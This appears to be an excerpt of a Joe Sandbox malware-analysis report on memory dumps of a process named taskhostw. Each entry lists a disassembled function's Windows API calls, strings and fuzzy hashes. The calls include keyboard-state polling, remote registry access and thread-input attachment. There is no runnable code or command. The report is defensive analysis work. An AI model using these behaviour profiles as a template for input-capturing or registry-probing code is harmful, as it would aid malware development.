Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 116c7d392638babe165d4c6bf4f609d88e901d4e61e2b76246dffd9bb1446abb
Instruction ID: dc20c738d8b89ce57bcbd136dabbe5f0cc89bb0b7973ceb73699905e65a72eee
Opcode Fuzzy Hash: 116c7d392638babe165d4c6bf4f609d88e901d4e61e2b76246dffd9bb1446abb
Instruction Fuzzy Hash: 73218E71604A05AFEF204F64DC90EBA77A9EF49768F18C619FA58D2190F731CC919770

Function 00D56E45 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00D56E65
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00D56E98
GetStdHandle.KERNEL32(0000000C), ref: 00D56EAA
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00D56EE4

Strings

nul, xrefs: 00D56EDF

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: c00924dbc4cc52f9031a9744e79f0424916796d640c8c3d93071de1b49377850
Instruction ID: 7a1809f8a228e8b766cb191fa3b3121fe4f0769af4f3cbb22e6e17e2c329148a
Opcode Fuzzy Hash: c00924dbc4cc52f9031a9744e79f0424916796d640c8c3d93071de1b49377850
Instruction Fuzzy Hash: 68219578501305ABDF209F29DC06A9A77B4EF44722F648619FCA0D72D0EB70D859CB70

Function 00D56F13 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00D56F32
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00D56F64
GetStdHandle.KERNEL32(000000F6), ref: 00D56F75
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00D56FAF

Strings

nul, xrefs: 00D56FAA

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: be2f4d1555ea58d98bf3b9b626e3c44ddff2c7fc035eddbafe2ce308ed22fb81
Instruction ID: b849d67345a949a470036df9b42bb62169221cecb700bb6ddce82efed83e6ad2
Opcode Fuzzy Hash: be2f4d1555ea58d98bf3b9b626e3c44ddff2c7fc035eddbafe2ce308ed22fb81
Instruction Fuzzy Hash: 1B219071A04305ABDF209F69AC04A9977A8EF45322F640A59FCA0D72D0E770D858CB70

Function 00D5ACCA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00D5ACDE
GetVolumeInformationW.KERNEL32 ref: 00D5AD32
__swprintf.LIBCMT ref: 00D5AD4B
SetErrorMode.KERNEL32(00000000,00000001,00000000,00D7F910), ref: 00D5AD89

Strings

%lu, xrefs: 00D5AD45

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 7670fdcad0be30c1909f613de049c6c7882c6fb79d470bba86ccc32fe5077622
Instruction ID: 9a9d1d7b9d69b522d29e8ecab6476bdc5fc8b77cdf70b600d616c6542c77da52
Opcode Fuzzy Hash: 7670fdcad0be30c1909f613de049c6c7882c6fb79d470bba86ccc32fe5077622
Instruction Fuzzy Hash: 93218335A00209AFCB20EFA4C985EAE7BB8EF49705B004069F909DB351DB31EA45DB71

Function 00D4A30F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00CF7D2C: _memmove.LIBCMT ref: 00CF7D66

Part of subcall function 00D4A15C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00D4A179
Part of subcall function 00D4A15C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D4A18C
Part of subcall function 00D4A15C: GetCurrentThreadId.KERNEL32(00000000), ref: 00D4A193
Part of subcall function 00D4A15C: AttachThreadInput.USER32(00000000), ref: 00D4A19A

GetFocus.USER32(00D7F910), ref: 00D4A334

Part of subcall function 00D4A1A5: GetParent.USER32(?), ref: 00D4A1B3

GetClassNameW.USER32(?,?,00000100), ref: 00D4A37D
EnumChildWindows.USER32 ref: 00D4A3A5
__swprintf.LIBCMT ref: 00D4A3BF

Strings

%s%d, xrefs: 00D4A3B9

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 682c6e580f9ffb391c7444efd593e1aeb625a62b23f2775a6ded2af118a60f5f
Instruction ID: ec799728a20a77a3fe7578fa755a96f3f6101aac6c3ff852a707991becec285d
Opcode Fuzzy Hash: 682c6e580f9ffb391c7444efd593e1aeb625a62b23f2775a6ded2af118a60f5f
Instruction Fuzzy Hash: E21181716403097BDF21BFA4DC8AFEA37B8EF49700F004075BA0CAA152DA705945DB72

Function 00D6EC69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00D6ED1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00D6ED4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00D6EE7E
CloseHandle.KERNEL32(?), ref: 00D6EEFF

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: c32c059468d1e4d570679fbd9bc2870424b6b8c4b708da9e07c539c6504f2260
Instruction ID: a9206387bde24c306224ee15f9e81a3bfc1ef9e2beb7a8465f06d174136b196e
Opcode Fuzzy Hash: c32c059468d1e4d570679fbd9bc2870424b6b8c4b708da9e07c539c6504f2260
Instruction Fuzzy Hash: 9F8171756043019FDB64DF28C846B2AB7E5EF48710F14881DFA99DB292DA71EC409B62

Function 02AA498D Relevance: 7.7, APIs: 5, Instructions: 163COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02AA49EB
_memcpy_s.LIBCMT ref: 02AA4A5D
__read_nolock.LIBCMT ref: 02AA4ABB
__filbuf.LIBCMT ref: 02AA4ADE
_memset.LIBCMT ref: 02AA4B22

Part of subcall function 02AA80A8: __getptd_noexit.LIBCMT ref: 02AA80A8

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: b9def032260d9a3caaa91155f958eb498d8e5f05eb94be06408ff888cba06e66
Instruction ID: ffbfaf9117b8059241570bf68cb6ff18eb6658af66b3f3f52341777a3aca9e04
Opcode Fuzzy Hash: b9def032260d9a3caaa91155f958eb498d8e5f05eb94be06408ff888cba06e66
Instruction Fuzzy Hash: 6B51B234A01205DFDB248FA9C8A06AEB7B5FF48324F148729F826972D0DFF19960DB54

Function 00D700C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CF7F41: _memmove.LIBCMT ref: 00CF7F82

Part of subcall function 00D70EA5: CharUpperBuffW.USER32(?,?), ref: 00D70EBC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D70188
RegOpenKeyExW.ADVAPI32 ref: 00D701C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00D7020E
RegCloseKey.ADVAPI32(?), ref: 00D7023A
RegCloseKey.ADVAPI32(00000000), ref: 00D70247

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 12bf5675e582fdddf1e2761f17e21e7c8a5de9a8f785a34af35ef37096ead395
Instruction ID: c319482252838c330bc9bc1ed29064ac0ddaab961a70b824c6843ccb22fc02de
Opcode Fuzzy Hash: 12bf5675e582fdddf1e2761f17e21e7c8a5de9a8f785a34af35ef37096ead395
Instruction Fuzzy Hash: BA512C71108304AFD714EF54D885F6EBBE8FF88704F54891DB69987291EB30E904DB62

Function 00D5E5FD Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32 ref: 00D5E6AB
GetPrivateProfileSectionW.KERNEL32 ref: 00D5E6D4
WritePrivateProfileSectionW.KERNEL32 ref: 00D5E713

Part of subcall function 00CF9997: __itow.LIBCMT ref: 00CF99C2
Part of subcall function 00CF9997: __swprintf.LIBCMT ref: 00CF9A0C

WritePrivateProfileStringW.KERNEL32 ref: 00D5E738
WritePrivateProfileStringW.KERNEL32 ref: 00D5E740

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 674956c9e925c6e873fae14abb1ed06fef8b2945539552fe53c0315cefa1c33d
Instruction ID: e4425b89bb1d4b7e0e87ce17cbe0cf64147e19fc794b635e8e180d52ea22ee78
Opcode Fuzzy Hash: 674956c9e925c6e873fae14abb1ed06fef8b2945539552fe53c0315cefa1c33d
Instruction Fuzzy Hash: 87513D35600209EFCF15EF64C981AADBBF5EF08314B148099E949AB362DB31EE51DF61

Function 00D7A088 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e08ea30a2efef656043a16a8f73b39a27a9e80998356984f918472ba6cc4eeb
Instruction ID: 5a991eddcf948cb302a7ab07f3f40b1d6636b7dd195ad1f2599bc11a4cb00da1
Opcode Fuzzy Hash: 6e08ea30a2efef656043a16a8f73b39a27a9e80998356984f918472ba6cc4eeb
Instruction Fuzzy Hash: 8D41B135900314ABE720DF2CCC45FADBBA4AB89360F998265EC5DA72E1E7309D41DA71

Function 00CF2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00CF2357
ScreenToClient.USER32(00DB57B0,?), ref: 00CF2374
GetAsyncKeyState.USER32 ref: 00CF2399
GetAsyncKeyState.USER32 ref: 00CF23A7

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 915a56d1834a23f56cbf897b78b8f8bf024121b9cebf4706ef83a0ffdcf0f591
Instruction ID: aaa83db4552ccdd12e60184562d3f0b1553e79e92c7eb83bb4685041ead1eaef
Opcode Fuzzy Hash: 915a56d1834a23f56cbf897b78b8f8bf024121b9cebf4706ef83a0ffdcf0f591
Instruction Fuzzy Hash: 5041B275904219FBDF169F64C844AEDBB74FB05324F10432AF928922A1D734AD94DFB1

Function 00D46700 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D4673D
TranslateAcceleratorW.USER32(?,?,?), ref: 00D46789
TranslateMessage.USER32(?), ref: 00D467B2
DispatchMessageW.USER32(?), ref: 00D467BC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D467CB

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 58cec5a2bcf83315ac7f09ec24d3849778c2c932e6ffddd9c998a20409b024ac
Instruction ID: 7d06447ac6088d87046faab0b42526ad706462e6fa331668b98cea1adb15ee11
Opcode Fuzzy Hash: 58cec5a2bcf83315ac7f09ec24d3849778c2c932e6ffddd9c998a20409b024ac
Instruction Fuzzy Hash: 3F31C670901706EFDB209FB4DC44FBA7BECAF02308F180265E426C66A5E725D889D772

Function 00D48CE1 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00D48CF2
PostMessageW.USER32 ref: 00D48D9C
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00D48DA4
PostMessageW.USER32 ref: 00D48DB2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00D48DBA

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 2eb0ef4733d61359e4d1315da93b873c5af90eedc9cb1dc24af31afb7fafc3b3
Instruction ID: 204c5ac894d1e68516d31fa1564ad8974de9a5b6e89ef0de599809db09e441dc
Opcode Fuzzy Hash: 2eb0ef4733d61359e4d1315da93b873c5af90eedc9cb1dc24af31afb7fafc3b3
Instruction Fuzzy Hash: 2231EE31900219EFDF10CF68D94CA9E3BB5EB14325F144229F929EB2D0C7B09950EBA0

Function 00D7B17F Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00CF2612: GetWindowLongW.USER32(?,000000EB), ref: 00CF2623

GetWindowLongW.USER32(?,000000F0), ref: 00D7B1C6
SetWindowLongW.USER32(00000000,000000F0,00000001,?,?,?,?,00D60FA5,00000000,?,00000000), ref: 00D7B1EB
SetWindowLongW.USER32(00000000,000000EC,000000FF,?,?,?,?,00D60FA5,00000000,?,00000000), ref: 00D7B203
GetSystemMetrics.USER32(00000004,?,?,?,?,?,?,?,00D60FA5,00000000,?,00000000), ref: 00D7B22C
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047), ref: 00D7B24A

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: ec69bdee0f1f7ef792a21fe2a386da58d0c701c51fccf084fa464282c3832ddf
Instruction ID: a35d5dc65c6cefccde272bcc85c3263e6c16ddb4cdf8f7bfdd1346c270219f9c
Opcode Fuzzy Hash: ec69bdee0f1f7ef792a21fe2a386da58d0c701c51fccf084fa464282c3832ddf
Instruction Fuzzy Hash: C9218031615615EFCB209F38DC08B6A37A4EB05735F148726BD2AD72E1F73098509BA0

Function 00CF12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00CF134D
SelectObject.GDI32(?,00000000), ref: 00CF135C
BeginPath.GDI32(?), ref: 00CF1373
SelectObject.GDI32(?,00000000), ref: 00CF139C

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 5fe326ce5784e0e402b85a7a586850a7daf3abde4a59cea4d05af405c8ec7656
Instruction ID: d556f41c76b30663f88b5ef10a64227bd167d5c5229255851eb3897b22e7a010
Opcode Fuzzy Hash: 5fe326ce5784e0e402b85a7a586850a7daf3abde4a59cea4d05af405c8ec7656
Instruction Fuzzy Hash: 56215975800709EBDB119F25EC0476D7BE8FB00321F58432AF928D62B4E3719995EFA2

Function 02ADB360 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 02ADB375
_memcmp.LIBCMT ref: 02ADB393
_memcmp.LIBCMT ref: 02ADB3A6
_memcmp.LIBCMT ref: 02ADB3BE
_memcmp.LIBCMT ref: 02ADB3D6

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 4e1b6e67d44f2b171d6f533ec532ea2a352de437404ae0b7aec8cd3365c584ed
Instruction ID: 38b1f12faae468b47a5b6c0e3f2e28ddbae9d0a509142565f6caf151f1418a05
Opcode Fuzzy Hash: 4e1b6e67d44f2b171d6f533ec532ea2a352de437404ae0b7aec8cd3365c584ed
Instruction Fuzzy Hash: A8019EFA6401097BE7046A119E81FAF776DAE00388B024562FD0697B41EFA4EE10D6F5

Function 00D54B3A Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00D54B61
__beginthreadex.LIBCMT ref: 00D54B7F
MessageBoxW.USER32 ref: 00D54B94
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00D54BAA
CloseHandle.KERNEL32(00000000), ref: 00D54BB1

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 91b2b47f583f5a9165b3c280820d16b920aeec7dfd737e626947b8c1e44ca2fa
Instruction ID: e57f74ce4bb07860685af190804736a4f9ab6c56d1709a92713312190e94cf9b
Opcode Fuzzy Hash: 91b2b47f583f5a9165b3c280820d16b920aeec7dfd737e626947b8c1e44ca2fa
Instruction Fuzzy Hash: 9F11E572905714FFCB119BA8AC04B9A7FACAB49325F144365FC18D3351D671C98487B1

Function 00D4852A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D48546
GetLastError.KERNEL32(?,00D4800A,?,?,?), ref: 00D48550
GetProcessHeap.KERNEL32(00000008,?,?,00D4800A,?,?,?), ref: 00D4855F
HeapAlloc.KERNEL32(00000000,?,00D4800A,?,?,?), ref: 00D48566
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D4857D

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

